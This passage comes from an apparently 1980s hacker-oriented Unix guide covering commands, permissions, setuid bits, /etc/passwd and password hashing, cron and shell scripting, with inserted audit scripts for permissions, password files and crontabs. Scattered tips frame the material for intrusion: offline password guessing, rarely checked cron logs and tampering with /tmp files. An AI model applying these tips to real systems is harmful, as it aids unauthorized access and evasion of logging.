	$ mail root
	Hi bill! This is a nice system.
	-John
	^d
	$
	To read mail:
	$ mail
	From john Thu Mar 13 02:00:00 1986
	Hi bill! This is a nice system.
	-John
	? d
	Message deleted.
	?q
	$

crypt	-This is the Unix file encryption utility. Type "crypt". You will then
	be prompted to enter the password. You then enter the text. Each line
	is encrypted when you press return, and the encrypted form is displayed
	on the screen. So, to encrypt a file, you must use I/O redirection.
	Type "crypt [password] < [file1] > [file2]". This will encrypt the
	contents of file1 and place the encrypted output in file2. If file2
	does not exist, it will be created. Two cautions: a password given on
	the command line is visible to every user on the system for as long as
	crypt runs ("ps -f" shows the full command line), so it is safer to let
	crypt prompt for it; and crypt's cipher is a rotor machine, not the DES
	used for login passwords, and it has long been known to be breakable,
	so do not rely on it to protect anything that matters.

passwd	-This is the command used to change the password of an account. The
	format is "passwd <account>". You must have superuser capabilities to
	change the password for any account other than the one you are logged
	in under. To change the password of the account you are currently
	using, simply type "passwd". You will then be prompted to enter the
	current password. Next, you will be asked to enter the new password.
	Then you will be asked to verify the new password. If you type the new
	password the same way both times, the password change will be
	complete. (Note: some systems use a security feature which forces you
	to use at least 2 non-alphanumeric characters in the password. If this
	is the case with the system you are on, you will be informed so if you
	try to enter a new password that does not contain at least 2
	non-alphanumeric characters.)

su	-This command is used to temporarily assume the id of another account.
	The format is "su <account>". If you don't specify an account, the
	default root is assumed. If the account has no password, you will then
	assume that account's identity. If it does have a password, you will
	be prompted to enter it. Beware of hacking passwords like this, as the
	system keeps a log of all attempted uses, both successful and
	unsuccessful, and which account you attempted to access (see the entry
	for /usr/adm/sulog in the section on special files).

mkdir	-This command creates a directory. The format is "mkdir <dirname>".

rmdir	-This command deletes a directory. The directory must be empty first.
	The format is "rmdir <dirname>".

mv	-Renames or moves a file. The syntax is "mv [oldname] [newname]". You
	can use full pathnames; if newname names another directory, or a path
	into one, the file is moved there rather than just renamed, so
	"mv junk /tmp/junk" moves junk into /tmp. As with cp, a file that
	already has the new name is replaced without warning.

-------------------------------------------------------------------------------
	Further help can usually be gained from the system itself. Most systems
feature on-line entries from the Unix System User's Manual. You can read these
entries using the man command. The format is "man <command>". Some Unix System
V systems also feature a menu-driven help facility. Simply type "help" to
access it. This one will provide you with a list of commands, as well as with
the manual entries for the commands.
-------------------------------------------------------------------------------

UNIX FILE AND DIRECTORY PROTECTIONS
-----------------------------------
	Every Unix account is assigned a specific user number, and a group
number. This is how the system identifies the user. Therefore, 2 accounts with
different usernames but the same user number would be considered by the system
to be the same id. These user and group numbers are what Unix uses to determine
file and directory access privileges.
	Unix has three different file/directory permissions: read, write, and
execute. This is how these permissions affect access to files:

read	-Allows a user to view the contents of the file.
write	-Allows a user to change the contents of a file.
execute	-Allows a user to execute a file (if it is an executable type of file;
	if it isn't, the user will get an error when trying to execute it).

This is how these permissions affect access to directories:

read	-Allows a user to list out the files in a directory (ls).
write	-Allows a user to create and delete files in this directory. (Note that
	deleting a file needs write permission on the directory it is in, not
	on the file itself.)
execute	-If a user has execute access to a directory, he can go to that
	directory with the cd command and open the files in it by name. If he
	also has read permission to that directory, he can also list it and
	gain information on the permissions for that directory and the files
	it contains, with the "l" option to the ls command, which will be
	explained soon.

	Unix divides users into 3 classes: user (the owner of the file or
directory), group (members of the group the file belongs to, which is normally
the owner's group), and other (anyone who doesn't fit into the first two
classes). You can specify what permissions to give to a file for each class of
user.
	To show the permissions of the files in a directory, use "ls -l". This
will list the contents of the directory (as in ls), and will show each's
permissions. For example:
	$ls
	bin	startrek
	$ ls -l
	drwxrwxrwx  2 bin    sys    12345 Mar 10 01:30 bin
	-rwxr-xr--  1 guest  users    256 Mar 20 02:25 startrek

	In the above example, the directory we are in contains a subdirectory
called bin and a file called "startrek". Here is an explanation of the fields:
The first field contains the file's type and permissions. Look at the first
field of the first line, "drwxrwxrwx". Note the "d" at the beginning. Then see
the "-" at the beginning of the first field for the file startrek. This shows
the file type. "d" is a directory. "-" is a file. "c" is a character device
file (and "b" a block device file). Now, back to the first field of the first
line again. Notice the "rwxrwxrwx". These are the permissions. The permissions
are divided into three groups: [user][group][other]. r stands for read, w
stands for write, and x stands for execute. "rwxrwxrwx" means that all three
classes of users, owner, group, and other, have read, write, and execute
permissions to the directory bin. Now look at the second line. It reads
"rwxr-xr--". Notice the "-"'s in the place of some of the permissions. This
means that the file was not given that permission. Line 2 shows that the owner
has read, write, and execute permissions for the file startrek, members of the
file's group have read and execute permissions but not write (notice the "-"
in the place of the group part's w), and all others have only read privileges
("r--"...there are hyphens in the place of the others part's w and x).
	Now, let's look at the other fields. The second field is a number. This
is the link count: how many directory entries (names) refer to this same file.
A plain file usually has one; a directory always has at least two, because it
is also named by its own "." entry. The third field shows the name of the owner
of the file (or directory). The fourth field, which is not shown on some
systems (BSD ls needs the "g" option to show it), shows the name of the group
the file belongs to. The fifth field shows the size of the file in bytes. The
sixth field shows the time and date the file was last modified. The last field
shows the name of the file or directory.
	The command used to change file/directory permissions is chmod. There
are 2 ways to change permissions: symbolically and absolutely. This will
explain both.
	When you change permissions symbolically, only the permissions you
specify to be added or deleted will be changed. The other permissions will
remain as they are. The format is:
chmod [u, g, or o][+ or -][rwx] [file/directory name]
The following abbreviations are used:
u	-User (the file or directory's owner)
g	-Group (members of the file's group)
o	-Others (all others)
r	-Read permission
w	-Write permission
x	-Execute permission

You use u, g, and o to specify which class you wish to change the privileges
for. To add a permission, type "chmod [class]+[permissions] [filename]". For
instance, to add group write permissions to the file startrek, type "chmod g+w
startrek". To delete permissions, use the "-". For instance, to remove the
owner's write access to the file "startrek", type "chmod u-w startrek".

	When you set file permissions absolutely, any permissions that you do
not give the file or directory are automatically deleted. The format for
setting permissions absolutely is "chmod [mode number] filename". You determine
the mode number by adding together the code numbers for the permissions you
wish to give the file. The numbers are octal, one digit per class (read counts
4, write 2 and execute 1 within each digit), which is why the sequence runs
1, 2, 4, 10, 20, 40 rather than 1, 2, 4, 8, 16, 32. Here are the permissions
and their numbers:

Others execute permission		1
Others write permission			2
Others read permission			4

Group execute permission		10
Group write permission			20
Group read permission			40

User (owner) execute permission		100
User (owner) write permission		200
User (owner) read permission		400

So "chmod 754 startrek" gives startrek exactly the rwxr-xr-- shown in the
listing above (400+200+100 for the owner, 40+10 for the group, 4 for others).
	There are also two special file modes, the UID and GID modes (set-user-id
and set-group-id), which are usually set absolutely (chmod also accepts "u+s"
and "g+s"). The UID mode, when applied to an executable file, means that when
another user executes the file, he executes it under the user number of the
owner (in other words, he runs the program as if he were the owner of the
file). If the file has its GID mode bit set, then when someone executes the
file, his group will temporarily be changed to the group the file belongs to
(the group shown in the ls -l listing). The permission number for the GID mode
is 2000, and the number for the UID mode is 4000, so a set-uid program that is
rwxr-xr-x has mode 4755. If the uid bit is set, there will be an "S" in the
place of the x in the owner permissions section when you check a file's
permissions:
-rwSr-xr-x
If the uid bit is set, and the owner of the file has execute permissions, the S
will not be capitalized:
-rwsr-xr-x
If the gid bit is set, the same applies to the x in the section on group
permissions. (A capital S means the bit is set on a file that class cannot
execute, which is almost always a mistake.)
	A short note here is in order on how these permissions affect superuser
accounts. They don't. The system skips the read, write and execute checks
entirely for user number 0 (the one exception is that it will not execute a
file that has no execute bit set for anyone). All superuser accounts have the
same user number, which means that the system considers them all to be the
same, that is, they are considered to be the root account. A superuser can
also change the permissions and the ownership of any file or directory on the
system, so no protection bit ever keeps root out.
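A script that does the arithmetic of this section in both directions: it turns the permission field of "ls -l" into the octal mode chmod takes, and scans a listing for set-uid and set-gid programs, which is the first thing anyone auditing (or attacking) a system looks for. This is an added example, not part of the original article; the listing it reads is constructed for it. It goes one step beyond the text in also handling the "t" (sticky) bit that appears in the others column of directories such as /tmp on newer systems.

```sh
#!/bin/sh
# Added example (not from the original article).

# perm_to_octal MODESTRING: turn the 10-character mode field of "ls -l"
# (e.g. -rwsr-xr-x) into the four-digit octal number chmod accepts
# (4755).  The leading digit is 4 for setuid, 2 for setgid, 1 for the
# sticky bit, added together.
perm_to_octal() {
    p=$1
    [ "${#p}" -eq 10 ] || { echo "bad mode string: $p" >&2; return 1; }
    special=0
    digits=""
    i=2                  # character 1 is the file type (d, -, c, ...)
    # Each triplet owns one special bit: owner -> setuid (4),
    # group -> setgid (2), others -> sticky (1).
    for weight in 4 2 1; do
        v=0
        r=$(echo "$p" | cut -c"$i"); i=$((i + 1))
        w=$(echo "$p" | cut -c"$i"); i=$((i + 1))
        x=$(echo "$p" | cut -c"$i"); i=$((i + 1))
        [ "$r" = r ] && v=$((v + 4))
        [ "$w" = w ] && v=$((v + 2))
        case $x in
            x)   v=$((v + 1)) ;;
            s|t) v=$((v + 1)); special=$((special + weight)) ;;  # bit set, executable
            S|T) special=$((special + weight)) ;;                # bit set, not executable
            -)   ;;
            *)   echo "bad permission character: $x" >&2; return 1 ;;
        esac
        digits="$digits$v"
    done
    echo "$special$digits"
}

# setuid_in_listing: read "ls -l" lines on stdin and print
# "<octal> <owner> <name>" for every entry with setuid or setgid set,
# the same thing an administrator looks for with "find / -perm -4000".
setuid_in_listing() {
    while read mode links owner group size mon day tm name; do
        case $mode in
            [-dlbcps]?????????) ;;     # a real entry
            *) continue ;;             # "total 12" and similar
        esac
        oct=$(perm_to_octal "$mode") || continue
        case $oct in
            0*|1*) ;;                  # no setuid/setgid bit
            *) echo "$oct $owner $name" ;;
        esac
    done
}

# Usage:  perm_to_octal -rwsr-xr-x          -> 4755
#         ls -l /bin | setuid_in_listing     (on a real system)
```

The capital-S case is reported with the same octal digit as the lower-case one, because the bit is set either way; only the execute bit differs.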

SPECIAL UNIX FILES
------------------
	This section will detail the purposes of some files that are found on
all systems. There are quite a few of these, and knowing their uses and what
format their entries are in is very useful to the hacker.

THE FILES
---------

/etc/passwd	-This is the password file, and is THE single most important
		file on the system. This file is where information on the
		system's accounts is stored. Each entry has 7 fields:

		username:password:user#:group#:description:home dir:shell

		The first field, naturally, is the account's username. The
		second field is the account's password (in an encrypted form).
		If this field is blank, the account doesn't have a password.
		The next field is the account's user number. The fourth field
		is the account's group number. The fifth field is for a
		description of the account (often called the GECOS field). It
		is used only in the password file, and is often just left
		blank, as it has no significance to the system. The sixth
		field is the pathname of the account's home directory, and the
		last field is the pathname of the account's shell program.
		Sometimes you may see an account with a program besides the
		standard shell programs (sh, csh, etc.) as its shell program.
		These are "command logins". These accounts execute these
		programs when logging in. For example, the "who" command login
		would have the /bin/who program as its shell.
		Here is a typical-looking entry:

		root:hGBfdJYhdhflK:0:1:Superuser:/:/bin/sh

		This entry is for the root account. Notice that the encrypted
		form of the password is 13 characters, although only the first
		8 characters of the password itself are significant. The first
		2 of the 13 characters are what is called a "salt string", and
		are used in the encryption process, which will be explained in
		more detail later; the remaining 11 are the encrypted result.
		Now, notice the user number, which is zero. Any account with a
		user number of 0 has superuser capabilities. The group number
		is 1. The account description is "Superuser". The account's
		home directory is the root directory, or "/". The account's
		shell is the Bourne shell (sh), which is kept in the directory
		/bin.
		Sometimes you may see an entry in the password field like this:
		:NHFfnldyNjh,21AB:
		Notice the comma after the 13th character, followed by 4 more
		characters. If an account has an entry like this, the account
		has a fixed expiration date on its password (password aging).
		The four characters are not read as ordinary digits: each one
		stands for a number from 0 to 63, counted through the alphabet
		. / 0-9 A-Z a-z (so "." is 0, "/" is 1, "0" is 2, "9" is 11,
		"A" is 12, and so on). The first character, here "2", gives the
		maximum number of weeks the account can keep the same password
		(4 weeks in this example). The second character gives how many
		weeks must pass before the account can change its password
		again (here "1", that is 3 weeks). (This is to prevent users
		from keeping the same old password by changing it when forced
		to and then changing it back immediately.) The last 2
		characters are an encoded (not encrypted) form of when the
		password was last changed, counted in weeks.
		Other unusual password field entries you might encounter are:
		::
		:,21:
		The first entry means that the account has no password. The
		second entry means that the account has no password yet, but
		has a fixed expiration date that will begin as soon as a
		password is given to it.
			Now, for an explanation of how the Unix system encrypts
		the passwords. The first thing any hacker thinks of is trying
		to decrypt the password file. This is as close to impossible as
		anything gets in this world. I've often heard other "hackers"
		brag about doing this...this is the biggest lie since Moses
		said "I did it". The encryption scheme is a variation on the
		DES (Data Encryption Standard). When you enter the command
		passwd (to change the password), the system will form a 2
		character "salt string" from the time of day and the process
		number of the passwd command you just issued. This 2-character
		string produces a slight change in the way the password is
		encrypted. There are a total of 4096 different variations on
		the encryption scheme caused by different salt string
		characters. This is NOT the same encryption scheme used by the
		crypt utility. The password is NEVER decrypted on the system.
		When you log on, the password you enter at the password prompt
		is encrypted (the salt string is taken from the password file)
		and compared to the encrypted entry in the password file.
		There is no secret system key to find: the password you typed
		is itself used as the DES key, and what gets encrypted (25
		times over) is a block of zeros. The login program does not do
		the encryption itself; it calls the C library routine crypt(3),
		which any program can call.
		What is practical is not decryption but guessing: a program
		that takes a list of likely passwords, encrypts each one with
		the salt from the entry and compares the result to the stored
		field will find every weak password on the system, and because
		/etc/passwd is readable by everyone it can do so off-line, on
		another machine, at leisure. That is why later systems keep
		the encrypted passwords in a separate "shadow" file readable
		only by root.
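The checks the entry above describes, carried out by a small script over password-file lines: accounts other than root with user number 0, empty or aging-only password fields, the decoded aging limits, and command logins. This is an added example, not part of the original article; the sample entries are constructed for it (no real system, users or hashes), and the aging characters are decoded with the ./0-9A-Za-z alphabet described above.

```sh
#!/bin/sh
# Added example (not from the original article): audit /etc/passwd-format
# lines read from stdin.  Each finding is one line with an 11-character
# tag followed by the account name.
passwd_audit() {
    awk -F: '
    # a64: position of a character in the aging alphabet (. = 0, / = 1,
    # 0-9 = 2-11, A-Z = 12-37, a-z = 38-63); -1 if it is not in it.
    function a64(c) {
        return index("./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", c) - 1
    }
    NF != 7                 { printf "MALFORMED  %s\n", $0; next }
    $3 == 0 && $1 != "root" { printf "EXTRA-UID0 %s\n", $1 }
    $2 == "" || $2 ~ /^,/   { printf "NO-PASSWD  %s\n", $1 }
    index($2, ",") > 0 {
        split($2, f, ",")
        printf "AGING      %s max=%dw min=%dw\n", $1, a64(substr(f[2], 1, 1)), a64(substr(f[2], 2, 1))
    }
    $7 != "" && $7 !~ "/(sh|csh|ksh|rsh)$" { printf "CMD-LOGIN  %s runs %s\n", $1, $7 }
    '
}

# Constructed sample entries (not from any real system):
sample='root:hGBfdJYhdhflK:0:1:Superuser:/:/bin/sh
toor::0:1:second superuser:/:/bin/sh
bill:NHFfnldyNjh,21AB:101:20:Bill:/usr/bill:/bin/sh
guest:,21:200:20:Guest:/usr/guest:/bin/sh
who::99:1:show users:/:/bin/who'

# Usage:  printf "%s\n" "$sample" | passwd_audit
#         passwd_audit < /etc/passwd        (on a real system)
```

An EXTRA-UID0 line is the one to act on first: a second user-number-0 account is exactly what someone who has already been in the system leaves behind.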

/etc/group	-This is the group file. This allows the superuser to give
		certain accounts group access to groups other than their own.
		Entries are in the format:

		group name:password:group number:users in this group

		The first field is the name of the group. The second is the
		field for the group password. In all my experience with Unix,
		I have never seen the password feature used. The third is the
		group's number. The fourth field is a list of the users who
		have group access to this group. (Note: this can include users
		whose group number is different from the number of the group
		whose entry you are reading in the group file.) The usernames
		are separated by commas. Here's an example:

		sys::2:root,sys,adm,lp

		To change to a new group identity, type "newgrp [group]". If
		the group has a password, you must enter the proper password.
		You cannot change to another group if you are not listed as a
		member of that group in the group file (unless the group has a
		password and you know it, which is what that field is for).


/dev/console	-This is the device file for the system console, or the
		system's main terminal.

/dev/tty##	-The device files for the system's terminals are usually in
		the form tty##, such as tty09, and sometimes ttyaa, ttyab, etc.
		Some ways to make use of the Unix system's treatment of devices
		as files will be explored in the section on Hacking Unix. When
		these files are not in use by a user (in other words, no one's
		logged onto this terminal), the file is owned by root. While a
		user is logged onto a terminal, however, ownership of its
		device file is temporarily transferred to that account.

/dev/dk##	-These are the device files for the system's disks.

login files	-There are special files that are in a user's home directory
		that contain commands that are executed when the user logs in.
		The name of the file depends on what shell the user is using.
		Here are the names of the files for the various shells:

		Shell	File
		-----	----
		sh	.profile
		csh	.cshrc (every new shell), then .login (login shells only)
		ksh	.profile (then the file named by the ENV variable)
		rsh	.profile

		Some systems also use a file called ".logout" (read by csh)
		that contains commands which are executed upon logoff.
			These types of files are called shell scripts, and
		will be explained in the section on Unix Software Development's
		explanation of shell programming.
/usr/adm/sulog	-This is a log of all attempted uses of the su utility. It
		shows when the attempt was made, what account made it, and
		which account the user attempted to assume, and whether or not
		the attempt was successful.
/usr/adm/loginlog
or
/usr/adm/acct/sum/loginlog	-This is a log of all logins to the system. This
		only includes the time and the account's username.

mbox		-These are files in the home directories of the system's
		users, that contain all the mail messages that they have saved.

/usr/mail/<user>	-These files in the directory /usr/mail are named after
			system accounts. They contain all the unread mail for
			the account they are named after.
/dev/null	-This is the null device file. Anything written to this file is
		just lost forever. Any attempt to read this file will result in
		an immediate end of file.
/tmp	-The directory /tmp provides storage space for temporary files created
	by programs and other processes. This directory is writable by everyone
	(rwxrwxrwx, or rwxrwxrwt on newer systems, where the t is the "sticky"
	bit that stops one user from deleting or renaming another user's files
	there). Examining these files occasionally reveals some interesting
	information, and if you know what program generates them and the
	format of the information in the file, you could easily change the
	info in the files, thereby changing the outcome of the program.

THE CRON UTILITIES
------------------
	An understanding of the cron utilities will be necessary to understand
certain parts of the section on Hacking Unix. This section will give a detailed
explanation of the workings of the cron utilities.
	The cron utility is a utility which carries out tasks which must be
performed on a periodic basis. These tasks, and the times when they are to be
carried out, are kept in 2 places: the file /usr/lib/crontab and the directory
/usr/spool/cron/crontabs.
	The file crontab in the directory /usr/lib contains entries for system
tasks that must be performed on a periodic basis. The format for the entries in
this file is:

minute hour dayofmonth monthofyear dayofweek commandstring

The first field is the minutes field. This is a value from 0-59.
The second field is the hour field, a value from 0-23.
The third field is the day of the month, a value from 1-31.
The fourth field is the month of the year, a value from 1-12.
The fifth field is the day of the week, a value from 0-6, with Sunday being 0.
The sixth field is the pathname and any arguments of the task to be carried
out.

An asterisk in a field means to carry out the task for every value of that
field. For instance, an asterisk in the minutes field would mean to carry out
that task every minute. Here's an example crontab entry:

0 1 * * * /bin/sync

This runs the sync command, which is kept in the directory /bin, at 1 am every
day. Commands in the file /usr/lib/crontab are performed with root privileges.
	In the directory /usr/spool/cron/crontabs, you will find files named
after system accounts. These files contain cron entries which are the same as
those in the file /usr/lib/crontab, but are carried out under the id of the
user the file is named after. The entries are in the same format.

BEWARE! When modifying cron files, cron activity is logged! All cron activity
is logged in the file /usr/adm/cronlog. I've found, however, that on most
systems, this file is almost never checked.
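A checker for entries in the six-field format just described, added here as an example (it is not part of the original article, and the sample crontab it reads is constructed for it). It validates each time field against the ranges above, accepting "*", a single number, or a comma-separated list of numbers, rejects anything else (including the "*/5" step syntax of later crons, which this format does not have), and warns about commands that are not given by absolute path, which matters because /usr/lib/crontab entries run as root.

```sh
#!/bin/sh
# Added example (not from the original article).

# field_ok VALUE LOW HIGH: true if VALUE is "*" or a comma-separated list
# of numbers, all within LOW..HIGH.
field_ok() {
    [ "$1" = "*" ] && return 0
    case $1 in
        ''|*[!0-9,]*|,*|*,|*,,*) return 1 ;;   # digits and commas only, no empty items
    esac
    lo=$2; hi=$3
    old_ifs=$IFS; IFS=,
    for n in $1; do
        if [ "$n" -lt "$lo" ] || [ "$n" -gt "$hi" ]; then
            IFS=$old_ifs; return 1
        fi
    done
    IFS=$old_ifs
    return 0
}

# crontab_check: read crontab lines on stdin and print one verdict per
# entry: "OK <entry>", "WARN ...: <entry>" or "BAD <reason>: <entry>".
crontab_check() {
    while read min hour dom mon dow cmd; do
        case $min in ''|'#'*) continue ;; esac          # blank lines and comments
        line="$min $hour $dom $mon $dow $cmd"
        reason=""
        if   [ -z "$cmd" ];            then reason="missing command"
        elif ! field_ok "$min"  0 59;  then reason="bad minute"
        elif ! field_ok "$hour" 0 23;  then reason="bad hour"
        elif ! field_ok "$dom"  1 31;  then reason="bad day of month"
        elif ! field_ok "$mon"  1 12;  then reason="bad month"
        elif ! field_ok "$dow"  0 6;   then reason="bad day of week"
        fi
        if [ -n "$reason" ]; then
            echo "BAD $reason: $line"
        else
            case $cmd in
                /*) echo "OK $line" ;;
                *)  echo "WARN command not an absolute path: $line" ;;
            esac
        fi
    done
}

# Constructed sample crontab (not from any real system):
sample='0 1 * * * /bin/sync
30 4 * * 0 /usr/lib/cleanup
0 25 * * * /bin/sync
*/5 * * * * /bin/true
0 2 1 * * cleanup.sh'

# Usage:  printf "%s\n" "$sample" | crontab_check
#         crontab_check < /usr/lib/crontab     (on a real system)
```

The WARN case is the security-relevant one: a relative command name is resolved through whatever PATH cron happens to run with, so an entry like the last sample line runs whichever "cleanup.sh" is found first, as root.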

UNIX SOFTWARE DEVELOPMENT
-------------------------
	The Unix operating system was initially created as an environment for
software development, and that remains its main use. This section will detail
some of the OS's main facilities for software development, the C compiler and
shell programming, and their related utilities. A few of the other languages
will be briefly touched upon at the end of this section, also.

SHELL PROGRAMMING
-----------------
	The shell is more than a simple command interpreter. It is also a
sophisticated programming tool, with variables, control structures, and the
features of just about any other programming language. Shell programs are
called scripts. Scripts are just text files which contain the names of commands
and programs. When the script is executed, the commands and programs whose
names it contains are executed as if you had typed in their names from your
keyboard. There are two ways to execute a shell script: if you have execute
permission to it, you can simply type in its name. Otherwise, (if you have read
access to it), you can type "sh [filename]". Here is a sample shell script:

who
whoami

As you can see, it contains the commands who and whoami. When you execute it,
you will see a list of the system's current users (the output of the who
command), and which account you are logged in under (the output of the whoami
command).
	This will concentrate solely on programming the Bourne shell (sh). While
shell programming is essentially the same with all the shells, there are
slight syntax differences that make shell scripts incompatible with shells that
they were not specifically written for.

SHELL VARIABLES
---------------
	Like any programming language, the shell can handle variables. To
set the value of a variable, type:

[variable]=[value]

For example:

counter=1

This will assign the value "1" to the variable counter. If the variable
counter does not already exist, the shell will create it. Note that there
are no "numeric" variables in shell programming- all the variables are
strings. For instance, we could later type:

counter="This is a string"

and counter would now be equal to "This is a string". (The quotation marks
are needed because the value contains spaces; without them the shell would
take "is" as a command to run.) There is a command called "expr", however,
that will let you treat a variable as a numeric value, and will be
explained later.
	When setting the value of a variable, you only use the variable
name. When you specify a variable as an argument to a command or program,
however, you must precede the variable with a dollar sign. For instance:

user=root

Now, we want to specify user as an argument to the command "ps -u". We
would type:

ps -u$user

which would, of course, display the processes of the user "root".

SPECIAL SHELL VARIABLES
-----------------------
	There are certain variables which are already pre-defined by the
shell, and have special meaning to it. Here is a list of the more important
ones and their meanings to the shell:

HOME -(Notice the caps. All pre-defined variables are in all-caps.) This
	variable contains the pathname of the user's home directory.

PATH -This is a good time to explain something which makes Unix a very
	unique operating system. In Unix, there are no commands "built-in" to
	the operating system. All the commands are just regular programs. The
	PATH variable contains a list of the pathnames of directories. When you
	type in the name of a command or program, the shell searches through
	the directories listed in the PATH variable (in the order specified in
	the variable) until it finds a program with the same name as the name
	you just typed in. The format for the list of directories in the PATH
	variable is:

	[pathname]:[pathname]:[pathname]...

	For example, the default search path is usually:

	/bin:/usr/bin:/usr/local

	A blank entry in the pathname, or an entry for ".", means to check the
	directory the user is currently in. For instance, all these paths
	contain blank or "." entries:

	.:/bin:/usr/bin [Notice . at beginning of path]
	:/bin:/usr/bin [Notice that path begins with :]
	/bin:/usr/bin: [Note that path ends with : ]

PS1 -This variable contains the shell prompt string. The default is usually
	"$" ("&" if you're using BSD Unix). If you have the "&" prompt, and
	wish to have the dollar sign prompt instead, just type:

	PS1=$

TERM -This contains the type of terminal you are using. Common terminal
	types are:

	ansi vt100 vt52 vt200 ascii tv150

	Etc. Just type "TERM=[termtype]" to set your terminal type.

COMMAND LINE VARIABLES
----------------------
	Command line variables are variables whose values are set to
arguments entered on the command line when you execute the shell script.
For instance, here is a sample shell script called "repeat" that uses
command line variables:

echo $1
echo $2
echo $3

The echo command prints out the values following it. In this case, it
will print out the values of the variables $1, $2, and $3. These are the
command line variables. For instance, $1 contains the value of the first
argument you entered on the command line, $2 contains the second, $3
contains the third, and so on. Now, execute the script:

repeat apples pears peaches

The output from the "repeat" shell script would be:

apples
pears
peaches

Get the idea?

SPECIAL COMMAND LINE VARIABLES
------------------------------
	There are 2 special command line variables, $0 and $#. $0 contains
the name of the command you typed in (in the last example, $0 would be
repeat). $# contains the number of arguments on the command line. (In the
last example, $# would be 3.)

SPECIAL COMMANDS FOR SHELL PROGRAMS
-----------------------------------
	These commands were added to the Unix OS especially for shell
programming. This section will list them, their syntax, and their uses.

read -This command reads the value of a variable from the terminal. The
	format is: "read [variable]". For example, "read number". The variable
	is not preceded by a dollar sign when used as an argument to this
	command.

echo -This command displays information on the screen. For example,
	"echo hello" would display "hello" on your terminal. If you specify
	a variable as an argument, it must be preceded by a dollar sign, for
	example "echo $greeting".

trap -This command traps certain events, such as the user being
	disconnected or pressing the break key, and tells what commands to
	carry out if they occur. The format is: trap "commands" eventcodes.
	The event codes are: 2 for break key, and 1 for disconnect. You can
	specify multiple commands within the quotation marks, separating the
	commands with a semicolon (";"). For example:

	trap "echo 'Hey stupid!'; echo \"Don't hit the break key\"" 2

	would echo "Hey stupid!" and "Don't hit the break key" if the user
	hits the break key while the shell script is being executed. (The
	second message is in escaped double quotes because it contains an
	apostrophe, which would end a single-quoted string early.)

exit -This command terminates the execution of a shell procedure, and
	returns a diagnostic value to the environment. The format is:
	"exit [value]", where value is 0 for true and 1 for false. The meaning
	of the value parameter will become clear later, in the section on
	the shell's provisions for conditional execution. If the shell script
	being executed is being executed by another shell script, control is
	passed to the next highest shell script.

ARITHMETIC WITH EXPR
--------------------
	The expr command allows you to perform arithmetic on the shell
variables, and sends the output to the screen. (Though the output may be
redirected.) The format is:

expr [arg] [function] [arg] [function] [arg]...

where [arg] may be either a value, or a variable (preceded by a dollar
sign), and [function] is an arithmetic operation, one of the following:

+ -Add.
- -Subtract.
\* -Multiply. (The backslash keeps the shell from treating * as a wildcard.)
/ -Divide.
% -Remainder from a division operation.

For example:

$ num1=3
$ num2=5
$ expr $num1 + $num2
8
$

TEXT MANIPULATION WITH SORT
---------------------------
	The sort command sorts text by ASCII or numeric value. The command
format is:

sort [field][option]... file

where file is the file you wish to sort. (The sort command's input may be
redirected, though, just as its output, which is ordinarily to the screen,
can be.) The sort command sorts by the file's fields. If you don't specify
any specific field, the first field is assumed. For example, say this file
contained names and test scores:

Billy Bob 10
Tom McKann 5
Doobie Kairful 20

The file's fields would be first name, last name, and score. So, to sort
the above file (called "students") by first name, you would issue the
command:

sort students

and you would see:

Billy Bob 10
Doobie Kairful 20
Tom McKann 5

If you wanted to sort the file's entries by another field, say the second
field of the file "students" (last names), you would specify:

sort +1 students

The +1 means to skip ahead one field and then begin sorting. Now, say we
wanted to sort the file by the 3rd field (scores). We would type:

sort +2 students

to skip 2 fields. But the output would be:

Billy Bob 10
Tom McKann 5
Doobie Kairful 20

Notice that the shorter names came first, regardless of the numbers in the
third field. There is a reason for this- the spaces between the second and
3rd fields are considered to be part of the 3rd field. You can tell the
sort command to ignore spaces when sorting a field, however, using the b
option. The format would be:

sort +2b students

but...another error! The output would be:

Billy Bob 10
Doobie Kairful 20
Tom McKann 5

Why did the value 5 come after 10 and 20? Because the sort command wasn't
really sorting by numeric value- it was sorting by the ASCII values of the
characters in the third field, and 5 comes after the digits 1 and 2. We
could specify that the field be treated by its numerical value by
specifying the n option:

sort +2n students

Output:

Tom McKann 5
Billy Bob 10
Doobie Kairful 20

Notice that if we use the n option, blanks are automatically ignored.

We can also specify that sort work in reverse order on a field. For
example, if we wanted to sort by last names in reverse order:

sort +1r students

Output:

Tom McKann 5
Doobie Kairful 20
Billy Bob 10

By using pipes, you can direct the output of one sort command to the input
of yet another sort command, thus allowing you to sort a file by more than
one field. This makes sort an excellent tool for text manipulation. It is
not, however, the only one. Remember, you can use any Unix command or
program in a shell script, and there are many different commands for text
manipulation in Unix, such as grep (described in an earlier section on
basic commands). Experiment with the different commands and ways of using
them.
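The students file sorted again, as an added example that is not from the article: it uses the POSIX -k key syntax (the +N form above is the historical spelling; -kN,N selects field N only), reproduces the ASCII-versus-numeric pitfall, and does a two-field sort in one command, since sort is not guaranteed to be stable and piping one sort into another does not reliably order a second field. The "Ann Zed 10" line is constructed to give the two-key sort a tie to break.

```shell
#!/bin/sh
# Added example: the article's "students" data sorted with POSIX -k keys.
# +N in the article means "skip N fields", so +1 is -k2,2 and +2 is -k3,3.
# LC_ALL=C gives plain ASCII ordering regardless of the user's locale.

# Constructed sample data, copied from the article's example.
students() {
    printf '%s\n' 'Billy Bob 10' 'Tom McKann 5' 'Doobie Kairful 20'
}

# sort +1 students: by last name (field 2)
by_last_name() { students | LC_ALL=C sort -k2,2; }

# sort +2b students: ASCII order on field 3 with leading blanks ignored,
# so "5" lands after "10" and "20" exactly as the article shows
by_score_ascii() { students | LC_ALL=C sort -k3,3b; }

# sort +2n students: numeric order on field 3 (-n ignores blanks itself)
by_score() { students | LC_ALL=C sort -k3,3n; }

# sort +1r students: last names in reverse
by_last_name_desc() { students | LC_ALL=C sort -k2,2r; }

# Two keys in one command: score descending, then first name ascending as
# the tie-breaker. A fourth constructed line is added so there is a tie.
by_score_desc_then_first() {
    { students; printf '%s\n' 'Ann Zed 10'; } | LC_ALL=C sort -k3,3nr -k1,1
}

echo "Numeric by score:"
by_score
```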

LOOPING
-------
	The for/do loop is a simple way to repeat a step a certain number
of times. The format is:

for [variable] in [values]
do [commands]
done

You do not precede the variable with a dollar sign in this command. The
for/do loop works by assigning the variable values from the list of values
given, one at a time. For example:

for loopvar in 1 2 3 5 6 7
do echo $loopvar
done

On the first pass of the loop, loopvar would be assigned the value 1, on
the second pass 2, on the third pass 3, on the fourth pass 5, on the fifth
pass 6, and on the sixth pass 7. I skipped the number 4 to show that you
do not have to use values in numerical order. In fact, you don't have to
